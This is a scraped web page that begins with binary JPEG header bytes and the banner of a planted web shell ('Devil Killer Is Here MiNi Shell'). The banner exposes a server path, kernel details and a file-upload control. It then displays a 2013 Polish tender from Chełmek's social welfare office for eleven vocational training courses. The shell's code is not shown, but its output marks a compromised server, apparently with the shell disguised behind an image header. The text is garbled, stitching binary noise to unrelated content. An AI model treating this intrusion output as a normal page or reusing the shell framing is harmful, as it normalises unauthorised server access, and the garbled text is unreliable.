JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130821/336376-N-2013.html

<p class="kh_header"><b>Chełmek: Usługi szkoleniowe w ramach projektu Czas na aktywność - program rozwoju i upowszechniania aktywnej integracji w Gminie Chełmek Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej z podziałem na zadania: 11 zadań</b><br>
<b>Numer ogłoszenia: 336376 - 2013; data zamieszczenia: 21.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Staicha 1, 32-660 Chełmek, woj. małopolskie, tel. 33 846 13 39, faks 33 846 13 39.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.chelmek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe w ramach projektu Czas na aktywność - program rozwoju i upowszechniania aktywnej integracji w Gminie Chełmek Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej z podziałem na zadania: 11 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie kursów zawodowych dla wskazanych uczestników rekrutowanych przez Zamawiającego z podziałem na zadania:
Zadanie 1.Profesjonalny sprzedawca+kasa fiskalna z fakturowaniem.
Zadanie 2.Opiekun osób starszych i niepełnosprawnych.
Zadanie 3. Spawacz metodami MIG i MAG.
Zadanie 4. Kucharz.
Zadanie 5. Florystyka z decoupage.
Zadanie 6. Operator koparko-ładowarki.
Zadanie 7. Magazynier z obsługą wózka widłowego i wymianą butli.
Zadanie 8. Technolog wykończenia wnętrz.
Zadanie 9. Cukiernik.
Zadanie 10. Konserwator terenów zielonych.
Zadanie 11. Kurs administracyjno - księgowy (kadry, płace, ZUS).
Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie nr 1:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego sprzedawca 
z obsługą kasy fiskalnej.
Zadanie nr 2:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego dla opiekuna osób starszych i niepełnosprawnych.
Zadanie nr 3:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego na spawacza metodami MIG i MAG.
Zadanie nr 4:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego dla kucharza.
Zadanie nr 5:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego - florystyka 
z decoupage.
Zadanie nr 6:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego operator koparko-ładowarki.
Zadanie nr 7:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego magazynier wraz z obsługą wózka widłowego.
Zadanie nr 8:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego technolog wykończenia wnętrz.
Zadanie nr 9:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego cukiernik.
Zadanie nr 10:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego konserwator terenów zielonych.
Zadanie nr 11:
Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedną usługę obejmującą swoim zakresem usługi szkoleniowe w zakresie kursu zawodowego w zakresie administracyjno-księgowym (kadry, płace, ZUS).
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów, o których mowa w rozdziale V SIWZ, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie nr 3:
Zamawiający uzna warunek za spełniony, jeżeli wykonawca dysponuje co najmniej dwoma osobami w tym: - co najmniej 1 osobą, która będzie spełniała wymogi Wytycznych Instytutu Spawalnictwa (Nr W-07/IS-41) w zakresie wykładowców szkolenia teoretycznego, - co najmniej 1 osobą, która będzie spełniała wymogi: Wytycznych Instytutu Spawalnictwa (Nr W-07/IS-41) w zakresie wykładowców szkolenia praktycznego
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów, o których mowa w rozdziale V SIWZ, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty - załącznik nr 1 do SIWZ.
2.	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.chelmek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Chełmku.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2013 godzina 10:00, miejsce: Miejsce: Miejski Ośrodek Pomocy Społecznej w Chełmku Sp. z o.o., ul. Staicha 1, Sekretariat pok. 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój 
i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej pt.: Czas na aktywność - program rozwoju i upowszechniania aktywnej integracji w Gminie Chełmek..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Profesjonalny sprzedawca+kasa fiskalna z fakturowaniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs obejmować będzie 90 godzin.
Zajęcia będą odbywać się w dwóch modułach.
Moduł I -  składa się z zajęć teoretycznych w wymiarze 22 godzin dydaktycznych oraz zajęć praktycznych w wymiarze 6 godzin dydaktycznych 
Moduł II - zajęcia teoretyczne w wymiarze  32 godzin dydaktycznych oraz z zajęć praktycznych w wymiarze  30 godzin dydaktycznych. 

Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opiekun osób starszych i niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs obejmować będzie łączny wymiar 120 godz., w tym 40 godz. zajęć  praktycznych,  80 godz. zajęć  teoretycznych.
Celem kursu jest przygotowanie słuchaczy do podjęcia pracy lub rozpoczęcia i prowadzenia działalności polegającej na świadczeniu usług w zakresie opieki nad ludźmi chorymi i niepełnosprawnymi oraz osobami starszymi.

Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Spawacz metodami MIG i MAG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu spawacza MIG MAG zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach i obowiązującymi certyfikatami.
Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kucharz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia musi być zrealizowany w łącznym wymiarze 120 godzin zegarowych, w tym 90 godzin zajęć praktycznych. Godzina zegarowa szkolenia liczy 60 minut. 

Po zakończonym szkoleniu jego uczestnicy powinni umieć: 
-	samodzielnie przygotowywać różnego rodzaju potrawy z surowców i półproduktów spożywczych zgodnie z odpowiednimi recepturami oraz techniką sporządzania; 
-	umiejętnie korzystać z nowoczesnych maszyn, urządzeń i sprzętów stosowanych w technologii gastronomicznej zgodnie z przepisami bhp i ppoż.; 
-	umiejętnie gospodarować surowcami, półproduktami i wyrobami gotowymi; 
-	umiejętnie przechowywać, magazynować artykuły spożywcze, surowce, półprodukty kulinarne; 
-	umiejętnie posługiwać się różnymi technikami i metodami obróbki kulinarnej; 
-	odpowiednio przygotowywać potrawy zależne od sposobu ich podawania; 
-	umiejętnie porcjować, wykańczać i dekorować potrawy z uwzględnieniem aktualnych trendów; 
-	umiejętnie kalkulować ceny oraz oferty kulinarne; 
-	przestrzegać przepisów sanitarnych, bezpieczeństwa i higieny pracy oraz przepisów przeciwpożarowych obowiązujących w zakładach żywienia zbiorowego; 
utrzymywać porządek i czystość na stanowisku pracy, przestrzegając zasady higieny pracy.

Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Florystyka z decoupage.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program kursu musi być zrealizowany w łącznym wymiarze 60 godzin zegarowych przypadających  na uczestnika kursu. Godzina zegarowa kursu liczy 60 minut. 
Program kursu musi obejmować zajęcia w zakresie wiedzy teoretycznej i praktycznej.
Kurs powinien kończyć się egzaminem sprawdzającym;

Zakres tematyczny szkolenia powinien zawierać informacje na temat: 
- prawidłowe postępowanie z materiałami roślinnymi, 
- zasady i techniki wykonywania kompozycji roślinnych, bukieciarstwo,
- kwiaty jako element dekoracji przestrzeni i stołu,
- florystyka ślubna oraz żałobna,
-  decoupage - zdobienie przedmiotów.

Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Operator koparko-ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia musi być zrealizowany w łącznym wymiarze 176 godzin zegarowych, w tym 60 godzin zajęć praktycznych. 
Godzina zegarowa szkolenia liczy 60 minut. 

Zakres tematyczny powinien zapewnić w szczególności nabycie wiedzy w zakresie: 
użytkowanie eksploatacyjne, 
dokumentacje techniczną, 
przepisy BHP, 
podstawy elektrotechniki, 
silniki spalinowe, 
elementy hydrauliki, 
budowę koparko - ładowarek, 
technologię robót, 
obsługę koparko - ładowarek. 

Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Magazynier z obsługą wózka widłowego i wymianą butli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą odbywać się w trzech modułach.
Moduł 1: magazynier (łącznie 33 godziny)
- przepisy bhp i p.poż. w magazynie - hurtowni 
- gospodarka magazynowa
- obsługa programu komputerowego do prowadzenia gospodarki magazynowej (nie mniej niż 15 godzin)
Moduł 2: kierowca-operator wózków jezdniowych z napędem silnikowym (łącznie 59 godzin)
- zagadnienia teoretyczne m.in. typy wózków jezdniowych, budowa wózka, przygotowanie wózka jezdniowego do zadań transportowych, bezpieczeństwo i higiena pracy przy eksploatacji wózków jezdniowych (44 godziny)
- praktyczna nauka jazdy (15 godzin)
Moduł 3: Bezpieczna wymiana butli gazowej w wózku jezdniowym (łącznie 8 godzin)

Program szkolenia musi być zrealizowany w łącznym wymiarze 100 godzin zegarowych, przypadających na każdego uczestnika szkolenia. 

Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Technolog wykończenia wnętrz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników do wykonywania pracy
 w zawodzie technolog wykończenia wnętrz. Zamówienie musi zostać zrealizowane zgodnie 
z programem nauczania zgodnym z obowiązującymi przepisami w tym zakresie. 
Zakres tematyczny kursu ma zawierać takie zagadnienia jak: 
- zasady BHP i P. poż. w budownictwie,
 - materiałoznawstwo,
 - zastosowanie, transportowanie i składowanie materiałów budowlanych, 
- organizacja stanowiska pracy, 
- drobne prace murarskie, - zaprawy murarskie i kładzenie tynków, 
- prace z zastosowaniem kładzenia płyt kartonowo - gipsowych, 
- montaż sufitów podwieszanych, - kładzenie posadzek, 
- prace malarskie (w tym dekoracyjne).
Liczba godzin szkolenia 130 godz. lekcyjnych ( podzielonych na moduł teoretyczny i praktyczny).  

Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Cukiernik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin szkolenia 120 godz. lekcyjnych - podzielonych na moduł teoretyczny 40 godz.  oraz praktyczny 80 godz..  

Kurs cukierniczy obejmuje naukę przygotowywania wysokiej jakości ciast i deserów oraz atrakcyjnego ich podawania. Celem kursu jest przygotowanie praktyczne i teoretyczne do wykonywania zawodu cukiernika.

Szkolenie powinno obejmować następujące zagadnienia:
-przepisy sanitarno-epidemiologiczne,
-przepisy BHP i p.poż.,
-dobra praktyka higieniczna z systemem HACCP (minimum sanitarne),
-dobieranie, obsługa maszyn, urządzeń i sprzętów (wyposażenie cukierni i piekarni),
-teoretyczne zagadnienia związane z przygotowywaniem wypieków,
